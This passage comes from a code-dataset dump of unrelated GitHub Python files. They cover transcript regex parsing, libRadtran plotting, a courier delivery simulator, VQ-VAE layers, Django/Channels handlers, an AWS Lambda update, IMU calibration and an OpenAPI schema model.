re.sub(r'\\s\\(.+\\)', '', test)\n# print(test)\nfor i in Line:\n i = re.sub(r'\\s\\(.+\\)', '', i)\n monica_except_directions += i +'\\n'\n# print(monica_except_directions)\nf.write(monica_except_directions)\nf.close()\ngg()\n\n# Can I find sentences that include a certain word?\n# Every line starts with 'character: ' and the sentence should include a certain word, let's say 'would'\nwith open('friends101.txt', 'r') as f:\n sentences = f.readlines()\n lines_with_would = ''\n for i in sentences:\n if re.match(r'[A-Za-z]+:', i):\n if re.search('would', i):\n lines_with_would += i\n print(lines_with_would)\n \n # to make it even simpler\n lines_with_would = [i for i in sentences if re.match(r'[A-Za-z]+:', i) and re.search('would', i)]\n for i in lines_with_would:\n print(i)\n with open('would.txt', 'w') as newf:\n newf.writelines(lines_with_would) \n \n\n","repo_name":"uakbuak/Do-it-python-practice","sub_path":"03 텍스트 파일 가공하기/ScriptCrawl.py","file_name":"ScriptCrawl.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"42362476864","text":"#!/usr/bin/env python\n\"\"\"\n| *author*: Johannes Röttenbacher\n| *created*: 01.03.2023\n\nResults of icecloud sensitivity simulations with libRadtran\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n\n\n.. |plot-path| replace:: ./docs/figures/icecloud\n\n\"\"\"\n\nif __name__ == \"__main__\":\n # %% import modules\n import pylim.helpers as h\n import pylim.halo_ac3 as meta\n import xarray as xr\n import numpy as np\n import matplotlib.pyplot as plt\n\n cm = 1/2.54\n cbc = h.get_cb_friendly_colors()\n\n # %% set paths\n campaign = \"halo-ac3\"\n flight_key = \"RF17\"\n flight = meta.flight_names[flight_key]\n date = flight[9:17]\n\n plot_path = \"./docs/figures/icecloud\"\n libradtran_path = h.get_path(\"libradtran_exp\", flight, campaign)\n libradtran_file = f\"HALO-AC3_HALO_libRadtran_simulation_icecloud_{date}_{flight_key}.nc\"\n\n # %% plotting meta\n h.set_cb_friendly_colors()\n plt.rc(\"font\", size=12)\n figsize_wide = (24 * cm, 12 * cm)\n figsize_equal = (12 * cm, 12 * cm)\n cloud_top = 7500 # m\n cloud_base = 6500 # m\n\n # %% read in libradtran file\n ds = xr.open_dataset(f\"{libradtran_path}/{libradtran_file}\")\n\n # %% plot all combinations of IWC and re_eff_ice\n ds_plot = ds\n nr_iwc = ds.iwc.shape[0]\n _, ax = plt.subplots(figsize=figsize_wide)\n for i in range(ds.re_ice.shape[0]):\n x = np.repeat(ds.re_ice[i].values, nr_iwc)\n ax.plot(x, ds.iwc, \"o\", ls=\"\")\n ax.set_xlim(0, 70)\n ax.set_xticks(np.arange(0, 70, 10))\n ax.set_yscale(\"log\")\n ax.grid()\n ax.set_title(\"All combinations of IWC and r$_{eff, ice}$\")\n ax.set_xlabel(r\"Ice Effective Radius ($\\mu$m)\")\n ax.set_ylabel(r\"Ice Water Content (g$\\,$m$^{-3}$)\")\n plt.tight_layout()\n figname = f\"{plot_path}/icecloud_sensitivity_study_iwc-re_ice_combinations.png\"\n plt.savefig(figname, dpi=300)\n plt.show()\n plt.close()\n\n # %% integrate spectral simulations\n ds[\"eglo_int\"] = ds.eglo.integrate(\"wavelength\")\n\n # %% calculate difference in spectra above and below cloud\n ds[\"eglo_diff\"] = ds.eglo.sel(altitude=cloud_top) - ds.eglo.sel(altitude=cloud_base)\n\n # %% plot spectral difference between above and below\n ds_plot = ds[\"eglo_diff\"]\n g = ds_plot.isel(time=0, drop=True).plot(x=\"wavelength\", hue=\"iwc\", col=\"re_ice\", col_wrap=3, add_legend=True)\n for i, ax in enumerate(g.axes.flat):\n ax.grid()\n ax.set_title(r\"r$_{eff, ice}$ = \" + f\"{ds.re_ice[i].values:.0f}\")\n ax.get_legend_handles_labels()\n if i > 2:\n ax.set_xlabel(\"Wavelength (nm)\")\n g.axes.flat[0].set_ylabel(r\"Irradiance (W$\\,$m$^{-2}$)\")\n g.axes.flat[3].set_ylabel(r\"Irradiance (W$\\,$m$^{-2}$)\")\n g.figlegend.set_title(r\"IWC (g$\\,$m$^{-3}$)\")\n g.figlegend.set_bbox_to_anchor((0.99, 0.77))\n plt.suptitle(\"Difference between Spectral Solar Downward Irradiance Above and Below Cloud\")\n plt.tight_layout()\n plt.subplots_adjust(top=0.9)\n figname = f\"{plot_path}/libradtran_icecloud_study_spectral_difference_above-below.png\"\n plt.savefig(figname, dpi=300)\n plt.show()\n plt.close()\n\n","repo_name":"jroettenbacher/phd_base","sub_path":"experiments/libradtran_icecloud_sensitivity_study.py","file_name":"libradtran_icecloud_sensitivity_study.py","file_ext":"py","file_size_in_byte":3109,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"3511686500","text":"import time\r\nimport numpy as np\r\nfrom simulator.orders import *\r\nfrom simulator.couriers_update_200_2min import *\r\nfrom simulator.utility import get_distance_hav\r\n\r\n# Update the order-swap handling time ---- to match real-world conditions\r\n\r\n# Run the experiment on the data of a single business-district Region\r\n\r\nclass Region:\r\n    def __init__(self, courier_init, real_orders):\r\n        self.courier_init = courier_init\r\n        self.real_orders = real_orders\r\n        self.day_orders = [] # initialization; stores order objects whose delivery status is updated at every time step; once the status is 2 the delivery is finished and the order is no longer tracked\r\n        self.day_couriers = [] # initialized with each courier's first-appearance time step and position; positions for later time steps can be appended based on the predicted route\r\n        self.city_time = 0 # a value in 0-8640 indicating the current time step\r\n        self.n_step = 86400 # total number of time steps in one day\r\n        # self.order_response_rate = 0\r\n\r\n        self.couriers_dict = {} # stores courier objects whose positions are updated at every time step\r\n\r\n        # self.day_encounter = [[] for _ in np.arange(self.n_step)]\r\n        self.encounter_exchange_event = []\r\n    # platform dispatch strategy (assign each order to the nearest courier)\r\n\r\n    def bootstrap_one_day_orders(self):\r\n        # load the order data into the model\r\n        # ['1', '31.255537', '121.45916', '31.25317194', '121.46889204', 0-4\r\n        # '2020-10-01 11:59:14', '2020-10-01 12:17:56', '37.99', '3.8', 5-8,\r\n        # '269345', '23487920.0', '2758233.0', '2020-10-01 12:03:56', 9-12\r\n        # '2020-10-01 12:07:16', '2020-10-01 12:09:06'] 13-14\r\n        # index 5 is order creation, 6 is delivery, 13 is arrival at the shop\r\n        day_orders = [[] for _ in np.arange(self.n_step)]\r\n        count = 0\r\n        for iorder in self.real_orders:\r\n            # 2020-10-1\r\n            order_create_timestep = int((int(time.mktime(time.strptime(iorder[5], \"%Y-%m-%d %H:%M:%S\"))) - int(\r\n                time.mktime(time.strptime(\"2020-10-01 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))) )\r\n            # 2020-10-12\r\n            # order_create_timestep = int((int(time.mktime(time.strptime(iorder[5], \"%Y-%m-%d %H:%M:%S\"))) - int(\r\n            #     time.mktime(time.strptime(\"2020-10-12 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))))\r\n            # time.mktime(time.strptime(\"2020-10-12 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))) / 10)\r\n            # if order_create_timestep < 0:\r\n            #     print('debug')\r\n\r\n            # 2020-6-6\r\n            # if len(iorder[5].split(':')[-1]) > 2:\r\n            #     order_create_time_str = \"2020-06-06 \"+iorder[5][:-1]\r\n            # elif len(iorder[5].split(':')[0]) > 2:\r\n            #     order_create_time_str = \"2020-06-06 \"+iorder[5][1:]\r\n            # elif iorder[5] == '':\r\n            #     continue\r\n            # else:\r\n            #     order_create_time_str = \"2020-06-06 \"+iorder[5]\r\n            # order_create_timestep = int((int(time.mktime(time.strptime(order_create_time_str, \"%Y-%m-%d %H:%M:%S\"))) - int(\r\n            #     time.mktime(time.strptime(\"2020-06-06 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))) / 10)\r\n\r\n            # promise_order_deliver_timestep = order_create_timestep + int(int(iorder[15]) / 10)\r\n            promise_order_deliver_timestep = order_create_timestep + int(int(iorder[15]))\r\n\r\n            price = float(iorder[7])\r\n\r\n            # clean up the input: some earlier 7-10 orders with promise=0 need to be filtered out;\r\n            if promise_order_deliver_timestep == order_create_timestep:\r\n                continue\r\n\r\n            day_orders[order_create_timestep].append(Order(int(iorder[0]), float(iorder[1]), float(iorder[2]),\r\n                                                           float(iorder[3]), float(iorder[4]),\r\n                                                           order_create_timestep, promise_order_deliver_timestep, price))\r\n            count += 1\r\n        # print(count)\r\n        self.day_orders = day_orders\r\n\r\n    def bootstrap_one_day_couriers(self):\r\n        # load the courier data into the model\r\n        # ['2758233.0', '31.255537', '121.45916', '2020-10-01 12:07:16']\r\n        day_couriers = [[] for _ in range(self.n_step)]\r\n        for i_couriers in self.courier_init:\r\n            # when initializing couriers here, the id can be the real id or a virtual id\r\n            # 2020-10-1\r\n            first_occur_time_step = int((int(time.mktime(time.strptime(i_couriers[3], \"%Y-%m-%d %H:%M:%S\"))) - int(\r\n                time.mktime(time.strptime(\"2020-10-01 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))) )\r\n            # 2020-10-12\r\n            # first_occur_time_step = int((int(time.mktime(time.strptime(i_couriers[3], \"%Y-%m-%d %H:%M:%S\"))) - int(\r\n            #     time.mktime(time.strptime(\"2020-10-12 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))))\r\n            # time.mktime(time.strptime(\"2020-10-12 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))) / 10)\r\n            # 2020-6-6\r\n            # if len(i_couriers[3].split(':')[-1]) > 2:\r\n            #     first_occur_time_str = \"2020-06-06 \"+i_couriers[3][:-1]\r\n            # elif len(i_couriers[3].split(':')[0]) > 2:\r\n            #     first_occur_time_str = \"2020-06-06 \"+i_couriers[3][1:]\r\n            # elif i_couriers[3] == '':\r\n            #     continue\r\n            # else:\r\n            #     first_occur_time_str = \"2020-06-06 \"+i_couriers[3]\r\n            # first_occur_time_step = int((int(time.mktime(time.strptime(first_occur_time_str, \"%Y-%m-%d %H:%M:%S\"))) - int(\r\n            #     time.mktime(time.strptime(\"2020-06-06 00:00:00\", \"%Y-%m-%d %H:%M:%S\")))) / 10)\r\n\r\n            c = Courier(int(float(i_couriers[0])), float(i_couriers[1]), float(i_couriers[2]), first_occur_time_step)\r\n            day_couriers[first_occur_time_step].append(c)\r\n            self.couriers_dict[int(float(i_couriers[0]))] = c\r\n        self.day_couriers = day_couriers\r\n\r\n    def env_initialize(self):\r\n        self.city_time = 0\r\n        self.bootstrap_one_day_orders()\r\n        self.bootstrap_one_day_couriers()\r\n        # self.step_bootstrap_order(self.day_orders[self.city_time], self.city_time)\r\n        # self.step_bootstrap_couriers(self.day_couriers[self.city_time], self.city_time)\r\n\r\n    def day_couriers_update(self, order_time):\r\n        # courier objects consumed by couriers_info_collect\r\n        couriers_list_before_curtime = []\r\n        for time_count in range(order_time + 1):\r\n            for ic in self.day_couriers[time_count]:\r\n                couriers_list_before_curtime.append(ic)\r\n        return couriers_list_before_curtime\r\n\r\n    def couriers_info_collect(self, one_order, T):\r\n        order_time_slot = T\r\n        courier_distance = [] # distances between the couriers and the shop\r\n        couriers_ = [] # couriers able to take orders at this moment (online couriers)\r\n        # cost_time = [] # extra time a courier needs for the shop-to-customer delivery\r\n\r\n        # to do :\r\n        # the courier info in day_couriers needs updating at every time step, similar to how env.step_couriers_state_update controls the .online state\r\n        # self.occur_time is the moment a courier first appears; let that courier keep taking orders from then on and update day_couriers (based on couriers_dist_time)\r\n\r\n        # -- solution: if there are orders at the current time step, look at the positions (most recently recorded) of the couriers already present in the system and dispatch the nearest one.\r\n        couriers_time_before = self.day_couriers_update(order_time_slot)\r\n        for ic in couriers_time_before:\r\n            # courier.full state: when a courier takes an order, compare against capacity and skip the courier if full\r\n            if not ic.full and ic.cur_order_num <= ic.capacity:\r\n                couriers_.append(ic)\r\n                courier_distance.append(get_distance_hav(ic.lat, ic.lon, float(one_order.shop_latitude),\r\n                                                         float(one_order.shop_longitude)))\r\n                # cost_time.append((ic, ic.take_order_temp(one_order)))\r\n\r\n        return couriers_, courier_distance\r\n","repo_name":"DHCAC2022/DHCAC","sub_path":"simulator/envs.py","file_name":"envs.py","file_ext":"py","file_size_in_byte":7947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27710956143","text":"import tensorflow as tf\nfrom functools import reduce\n\n\nclass PreNet(tf.layers.Layer):\n\n    def __init__(self, out_units,\n                 trainable=True, name=None, dtype=None, **kwargs):\n        super(PreNet, self).__init__(trainable=trainable, name=name, dtype=dtype,\n                                     **kwargs)\n\n        self._conv2d = tf.layers.Conv2D(out_units,\n                                        kernel_size=(1, 1),\n                                        strides=(1, 1),\n                                        padding='SAME')\n\n    def call(self, inputs, **kwargs):\n        return self._conv2d(inputs)\n\n\nclass ResidualBlock(tf.layers.Layer):\n\n    def __init__(self, out_units, residual_index, num_residual_hiddens,\n                 trainable=True, name=None, dtype=None, **kwargs):\n        super(ResidualBlock, self).__init__(trainable=trainable, name=name, dtype=dtype,\n                                            **kwargs)\n\n        self._res3x3 = tf.layers.Conv2D(filters=num_residual_hiddens,\n                                        kernel_size=(3, 3),\n                                        strides=(1, 1),\n                                        padding='SAME',\n                                        activation=tf.nn.relu,\n                                        name=f\"res3x3_{residual_index}\")\n\n        self._res1x1 = tf.layers.Conv2D(filters=out_units,\n                                        kernel_size=(1, 1),\n                                        strides=(1, 1),\n                                        padding='SAME',\n                                        activation=None,\n                                        name=f\"res1x1_{residual_index}\")\n\n    def call(self, inputs, **kwargs):\n        h_i = self._res3x3(inputs)\n        h_i = self._res1x1(h_i)\n        h_i += inputs\n        return tf.nn.relu(h_i)\n\n\nclass ResidualStack(tf.layers.Layer):\n\n    def __init__(self, num_hiddens, num_residual_layers, num_residual_hiddens,\n                 trainable=True, name=None, dtype=None, **kwargs):\n        super(ResidualStack, self).__init__(trainable=trainable, name=name, dtype=dtype,\n                                            **kwargs)\n\n        self._residual_layers = [ResidualBlock(num_hiddens, i, num_residual_hiddens, name=f\"residual_block_{i}\") for i\n                                 in range(num_residual_layers)]\n\n    def call(self, inputs, **kwargs):\n        return reduce(lambda acc, l: l(acc), self._residual_layers, inputs)\n\n\nclass Encoder(tf.layers.Layer):\n\n    def __init__(self, num_hiddens, num_residual_layers, num_residual_hiddens,\n                 trainable=True, name=None, dtype=None, **kwargs):\n        super(Encoder, self).__init__(trainable=trainable, name=name, dtype=dtype,\n                                      **kwargs)\n\n        conv2d_1 = tf.layers.Conv2D(filters=num_hiddens // 2,\n                                    kernel_size=(4, 4),\n                                    strides=(2, 2),\n                                    padding='SAME',\n                                    activation=tf.nn.relu)\n\n        conv2d_2 = tf.layers.Conv2D(filters=num_hiddens,\n                                    kernel_size=(4, 4),\n                                    strides=(2, 2),\n                                    padding='SAME',\n                                    activation=tf.nn.relu)\n\n        conv2d_3 = tf.layers.Conv2D(filters=num_hiddens,\n                                    kernel_size=(3, 3),\n                                    strides=(1, 1),\n                                    padding='SAME',\n                                    activation=tf.nn.relu)\n\n        self._convolutions = [conv2d_1, conv2d_2, conv2d_3]\n        self._residual_stack = ResidualStack(num_hiddens, num_residual_layers, num_residual_hiddens)\n\n    def call(self, inputs, **kwargs):\n        output_convs = reduce(lambda acc, l: l(acc), self._convolutions, inputs)\n        residual_output = self._residual_stack(output_convs)\n        return residual_output\n\n\nclass Decoder(tf.layers.Layer):\n\n    def __init__(self, out_units, num_hiddens, num_residual_layers, num_residual_hiddens,\n                 trainable=True, name=None, dtype=None, **kwargs):\n        super(Decoder, self).__init__(trainable=trainable, name=name, dtype=dtype,\n                                      **kwargs)\n\n        conv2d_1 = tf.layers.Conv2D(filters=num_hiddens,\n                                    kernel_size=(3, 3),\n                                    strides=(1, 1),\n                                    padding='SAME',\n                                    activation=tf.nn.relu)\n\n        residual_stack = ResidualStack(num_hiddens, num_residual_layers, num_residual_hiddens)\n\n        conv2dt_1 = tf.layers.Conv2DTranspose(filters=num_hiddens // 2,\n                                              kernel_size=(4, 4),\n                                              strides=(2, 2),\n                                              padding='SAME',\n                                              activation=tf.nn.relu)\n\n        conv2dt_2 = tf.layers.Conv2DTranspose(filters=out_units,\n                                              kernel_size=(4, 4),\n                                              strides=(2, 2),\n                                              padding='SAME',\n                                              activation=None)\n\n        self._layers = [conv2d_1, residual_stack, conv2dt_1, conv2dt_2]\n\n    def call(self, inputs, **kwargs):\n        reconstruction = reduce(lambda acc, l: l(acc), self._layers, inputs)\n        return reconstruction\n","repo_name":"TanUkkii007/vqvae","sub_path":"image2d/modules.py","file_name":"modules.py","file_ext":"py","file_size_in_byte":5556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"2676680841","text":"from django.utils import timezone\nfrom django.conf import settings\n\nfrom .utils import log_to_terminal, fc7_sort\nfrom .sender import chatbot\nimport constants as constants\nfrom .models import GameRound, ImageRanking\n\nfrom channels import Group\n\nimport json\nimport redis\nimport datetime\nimport os\nimport shutil\nimport pdb\n\n\nr = redis.StrictRedis(host='localhost', port=6379, db=0)\n\n\ndef ws_connect(message):\n \"Method called when a user is connected through SocketIO\"\n pass\n\n\ndef ws_message(message):\n \"Method called when there is message from the SocketIO client\"\n\n body = json.loads(message.content['text'])\n\n if body[\"event\"] == \"ConnectionEstablished\":\n # Event when the user is connected to the socketio client\n Group(body[\"socketid\"]).add(message.reply_channel)\n log_to_terminal(body[\"socketid\"], {\n \"info\": \"User added to the Channel Group\"})\n\n elif body[\"event\"] == \"start\":\n # Event when the user starts to play the game\n current_datetime = timezone.now()\n r.set(\"start_time_{}\".format(\n body[\"socketid\"]),\n current_datetime.strftime(\"%I:%M%p on %B %d, %Y\"))\n\n elif body[\"event\"] == \"questionSubmitted\":\n # Event when the user submits a question to the backend\n body['question'] = body['question'].lower()\n bot = body['bot']\n chatbot(body['question'],\n body['prev_history'],\n os.path.join(settings.BASE_DIR, body['target_image'][1:]),\n body[\"socketid\"],\n bot)\n\n elif body['event'] == \"imageSubmitted\":\n # Event when the user selects an image after each round of a game\n GameRound.objects.create(\n socket_id=body['socketid'],\n user_picked_image=body['user_picked_image'],\n worker_id=body['worker_id'],\n assignment_id=body['assignment_id'],\n level=body['level'],\n hit_id=body['hit_id'],\n game_id=body['game_id'],\n round_id=body['round_id'],\n question=body['question'],\n answer=body['answer'].replace(\"\", \"\").replace(\"\", \"\"),\n history=body['history'],\n target_image=body['target_image'],\n bot=body['bot'],\n task=body['task'],\n )\n log_to_terminal(body[\"socketid\"], {\"image_selection_result\": True})\n\n elif body['event'] == 'finalImagesSelected':\n # Event when the user submit the ranking of after completing all rounds\n ImageRanking.objects.create(\n socket_id=body['socketid'],\n final_image_list=body['final_image_list'],\n worker_id=body['worker_id'],\n assignment_id=body['assignment_id'],\n level=body['level'],\n hit_id=body['hit_id'],\n game_id=body['game_id'],\n bot=body['bot'],\n target_image=body['target_image'],\n score=body['bonus'],\n task=body['task'],\n )\n\n\ndef ws_disconnect(message):\n \"Method invoked when the client disconnects the socket connection\"\n pass\n","repo_name":"GT-Vision-Lab/GuessWhich","sub_path":"amt/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"69"}
+{"seq_id":"26681966456","text":"import json\nimport boto3\n\nconn_ddb = boto3.resource('dynamodb').Table('clients')\n\n\ndef update_client(event, context):\n    try:\n        id = event[\"pathParameters\"][\"id\"]\n        body = json.loads(event[\"body\"])\n        client = {\n            \"id\": id,\n            \"name\": body[\"name\"]\n        }\n        conn_ddb.put_item(Item=client)\n        response = {\"statusCode\": 200, \"body\": json.dumps({\"client\": client})}\n        return response\n    except Exception as e:\n        response = {\"statusCode\": 400, \"body\": json.dumps({\"error\": \"Bad request: \"+str(e)})}\n        return response","repo_name":"MartinsMessias/serverless_api_crud_aws","sub_path":"clients/update_client.py","file_name":"update_client.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"69"}
+{"seq_id":"70026225819","text":"# register/views.py\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.shortcuts import render, redirect\n\ndef register_view(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n # Redirect to login or home page after successful registration\n return redirect('login') # Replace 'login' with your login URL\n else:\n form = UserCreationForm()\n\n return render(request, 'register/register.html', {'form': form})\n","repo_name":"abdullah21079/OCRS-Update","sub_path":"register/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"21304648391","text":"import adafruit_bno055\nimport board\n#import zmq\n\nfrom json import dumps \nfrom signal import SIGINT, signal\nfrom sys import exit\nfrom time import sleep, time_ns\n\n# Sample rate (seconds)\nsample_rate = 1\n\n# BNO055 sensor board\nbno055 = adafruit_bno055.BNO055_I2C(board.I2C())\n\n# Set config mode\nprint('Set `CONFIG_MODE`')\nprint(f\"current_mode = {bno055.mode}\")\n#bno055.mode = adafruit_bno055.CONFIG_MODE\nbno055.mode = adafruit_bno055.NDOF_FMC_OFF_MODE\n\nprint(\"Updated mode\")\nprint(f\"bno055.mode = {bno055.mode}\")\n\ndef status() -> str:\n while True:\n yield dumps({\n 'timestamp': time_ns(),\n 'calibrated': bno055.calibrated,\n 'calibration_status': { k:v for (k,v) in zip(['sys', 'gyro', 'accel', 'mag'], bno055.calibration_status) }\n })\n sleep(sample_rate)\n\ndef close(signum, frame):\n print('Set mode to `NDOF_MODE`')\n bno055.mode = adafruit_bno055.NDOF_MODE\n\n print('Closing...')\n print(f'signum: {signum}')\n print(f'frame: {frame}')\n exit()\n \nsignal(SIGINT, close)\n\nstatus = status()\n\nwhile True:\n print(next(status))\n","repo_name":"jagrafft/iot-data-stream-utils","sub_path":"iot_zmq_publishers/devices/BNO055/calibrate_BNO055.py","file_name":"calibrate_BNO055.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4867069896","text":"from typing import Any, Dict, List, Optional, Union\n\nfrom pydantic import BaseModel, Extra, Field\nfrom .discriminator import Discriminator\nfrom .external_documentation import ExternalDocumentation\nfrom .reference import Reference\nfrom .xml import XML\n\n\nclass Schema(BaseModel):\n    \"\"\"\n    The Schema Object allows the definition of input and output data types.\n    These types can be objects, but also primitives and arrays.\n    This object is an extended subset of the [JSON Schema Specification Wright Draft 00](https://json-schema.org/).\n\n    For more information about the properties,\n    see [JSON Schema Core](https://tools.ietf.org/html/draft-wright-json-schema-00)\n    and [JSON Schema Validation](https://tools.ietf.org/html/draft-wright-json-schema-validation-00).\n    Unless stated otherwise, the property definitions follow the JSON Schema.\n    \"\"\"\n\n    \"\"\"\n    The following properties are taken directly from the JSON Schema definition and follow the same specifications:\n    \"\"\"\n\n    title: Optional[str] = None\n    \"\"\"\n    The value of \"title\" MUST be a string.\n\n    The title can be used to decorate a user interface with\n    information about the data produced by this user interface.\n    The title will preferably be short.\n    \"\"\"\n\n    multipleOf: Optional[float] = Field(default=None, gt=0.0)\n    \"\"\"\n    The value of \"multipleOf\" MUST be a number, strictly greater than 0.\n    \n    A numeric instance is only valid if division by this keyword's value\n    results in an integer.\n    \"\"\"\n\n    maximum: Optional[float] = None\n    \"\"\"\n    The value of \"maximum\" MUST be a number, representing an upper limit\n    for a numeric instance.\n    \n    If the instance is a number, then this keyword validates if\n    \"exclusiveMaximum\" is true and instance is less than the provided\n    value, or else if the instance is less than or exactly equal to the\n    provided value.\n    \"\"\"\n\n    exclusiveMaximum: Optional[bool] = None\n    \"\"\"\n    The value of \"exclusiveMaximum\" MUST be a boolean, representing\n    whether the limit in \"maximum\" is exclusive or not. An undefined\n    value is the same as false.\n    \n    If \"exclusiveMaximum\" is true, then a numeric instance SHOULD NOT be\n    equal to the value specified in \"maximum\". If \"exclusiveMaximum\" is\n    false (or not specified), then a numeric instance MAY be equal to the\n    value of \"maximum\".\n    \"\"\"\n\n    minimum: Optional[float] = None\n    \"\"\"\n    The value of \"minimum\" MUST be a number, representing a lower limit\n    for a numeric instance.\n    \n    If the instance is a number, then this keyword validates if\n    \"exclusiveMinimum\" is true and instance is greater than the provided\n    value, or else if the instance is greater than or exactly equal to\n    the provided value.\n    \"\"\"\n\n    exclusiveMinimum: Optional[bool] = None\n    \"\"\"\n    The value of \"exclusiveMinimum\" MUST be a boolean, representing\n    whether the limit in \"minimum\" is exclusive or not. An undefined\n    value is the same as false.\n    \n    If \"exclusiveMinimum\" is true, then a numeric instance SHOULD NOT be\n    equal to the value specified in \"minimum\". If \"exclusiveMinimum\" is\n    false (or not specified), then a numeric instance MAY be equal to the\n    value of \"minimum\".\n    \"\"\"\n\n    maxLength: Optional[int] = Field(default=None, ge=0)\n    \"\"\"\n    The value of this keyword MUST be a non-negative integer.\n\n    The value of this keyword MUST be an integer. This integer MUST be\n    greater than, or equal to, 0.\n    \n    A string instance is valid against this keyword if its length is less\n    than, or equal to, the value of this keyword.\n    \n    The length of a string instance is defined as the number of its\n    characters as defined by RFC 7159 [RFC7159].\n    \"\"\"\n\n    minLength: Optional[int] = Field(default=None, ge=0)\n    \"\"\"\n    A string instance is valid against this keyword if its length is\n    greater than, or equal to, the value of this keyword.\n    \n    The length of a string instance is defined as the number of its\n    characters as defined by RFC 7159 [RFC7159].\n    \n    The value of this keyword MUST be an integer. This integer MUST be\n    greater than, or equal to, 0.\n    \n    \"minLength\", if absent, may be considered as being present with\n    integer value 0.\n    \"\"\"\n\n    pattern: Optional[str] = None\n    \"\"\"\n    The value of this keyword MUST be a string. This string SHOULD be a\n    valid regular expression, according to the ECMA 262 regular\n    expression dialect.\n    \n    A string instance is considered valid if the regular expression\n    matches the instance successfully. Recall: regular expressions are\n    not implicitly anchored.\n    \"\"\"\n\n    maxItems: Optional[int] = Field(default=None, ge=0)\n    \"\"\"\n    The value of this keyword MUST be an integer. This integer MUST be\n    greater than, or equal to, 0.\n    \n    An array instance is valid against \"maxItems\" if its size is less\n    than, or equal to, the value of this keyword.\n    \"\"\"\n\n    minItems: Optional[int] = Field(default=None, ge=0)\n    \"\"\"\n    The value of this keyword MUST be an integer. This integer MUST be\n    greater than, or equal to, 0.\n    \n    An array instance is valid against \"minItems\" if its size is greater\n    than, or equal to, the value of this keyword.\n    \n    If this keyword is not present, it may be considered present with a\n    value of 0.\n    \"\"\"\n\n    uniqueItems: Optional[bool] = None\n    \"\"\"\n    The value of this keyword MUST be a boolean.\n\n    If this keyword has boolean value false, the instance validates\n    successfully. If it has boolean value true, the instance validates\n    successfully if all of its elements are unique.\n    \n    If not present, this keyword may be considered present with boolean\n    value false.\n    \"\"\"\n\n    maxProperties: Optional[int] = Field(default=None, ge=0)\n    \"\"\"\n    The value of this keyword MUST be an integer. This integer MUST be\n    greater than, or equal to, 0.\n    \n    An object instance is valid against \"maxProperties\" if its number of\n    properties is less than, or equal to, the value of this keyword.\n    \"\"\"\n\n    minProperties: Optional[int] = Field(default=None, ge=0)\n    \"\"\"\n    The value of this keyword MUST be an integer. This integer MUST be\n    greater than, or equal to, 0.\n    \n    An object instance is valid against \"minProperties\" if its number of\n    properties is greater than, or equal to, the value of this keyword.\n    \n    If this keyword is not present, it may be considered present with a\n    value of 0.\n    \"\"\"\n\n    required: Optional[List[str]] = Field(default=None, min_items=1)\n    \"\"\"\n    The value of this keyword MUST be an array. This array MUST have at\n    least one element. Elements of this array MUST be strings, and MUST\n    be unique.\n    \n    An object instance is valid against this keyword if its property set\n    contains all elements in this keyword's array value.\n    \"\"\"\n\n    enum: Optional[List[Any]] = Field(default=None, min_items=1)\n    \"\"\"\n    The value of this keyword MUST be an array. This array SHOULD have\n    at least one element. Elements in the array SHOULD be unique.\n    \n    Elements in the array MAY be of any type, including null.\n    \n    An instance validates successfully against this keyword if its value\n    is equal to one of the elements in this keyword's array value.\n    \"\"\"\n\n    \"\"\"\n    The following properties are taken from the JSON Schema definition\n    but their definitions were adjusted to the OpenAPI Specification.\n    \"\"\"\n\n    type: Optional[str] = None\n    \"\"\"\n    **From OpenAPI spec:\n    Value MUST be a string. Multiple types via an array are not supported.**\n    \n    From JSON Schema:\n    The value of this keyword MUST be either a string or an array. If it\n    is an array, elements of the array MUST be strings and MUST be\n    unique.\n    \n    String values MUST be one of the seven primitive types defined by the\n    core specification.\n    \n    An instance matches successfully if its primitive type is one of the\n    types defined by keyword. Recall: \"number\" includes \"integer\".\n    \"\"\"\n\n    allOf: Optional[List[Union[Reference, \"Schema\"]]] = None\n    \"\"\"\n    **From OpenAPI spec:\n    Inline or referenced schema MUST be of a [Schema Object](#schemaObject) and not a standard JSON Schema.**\n    \n    From JSON Schema:\n    This keyword's value MUST be an array. This array MUST have at least\n    one element.\n    \n    Elements of the array MUST be objects. Each object MUST be a valid\n    JSON Schema.\n    \n    An instance validates successfully against this keyword if it\n    validates successfully against all schemas defined by this keyword's\n    value.\n    \"\"\"\n\n    oneOf: Optional[List[Union[Reference, \"Schema\"]]] = None\n    \"\"\"\n    **From OpenAPI spec:\n    Inline or referenced schema MUST be of a [Schema Object](#schemaObject) and not a standard JSON Schema.**\n    \n    From JSON Schema:\n    This keyword's value MUST be an array. This array MUST have at least\n    one element.\n    \n    Elements of the array MUST be objects. Each object MUST be a valid\n    JSON Schema.\n    \n    An instance validates successfully against this keyword if it\n    validates successfully against exactly one schema defined by this\n    keyword's value.\n    \"\"\"\n\n    anyOf: Optional[List[Union[Reference, \"Schema\"]]] = None\n    \"\"\"\n    **From OpenAPI spec:\n    Inline or referenced schema MUST be of a [Schema 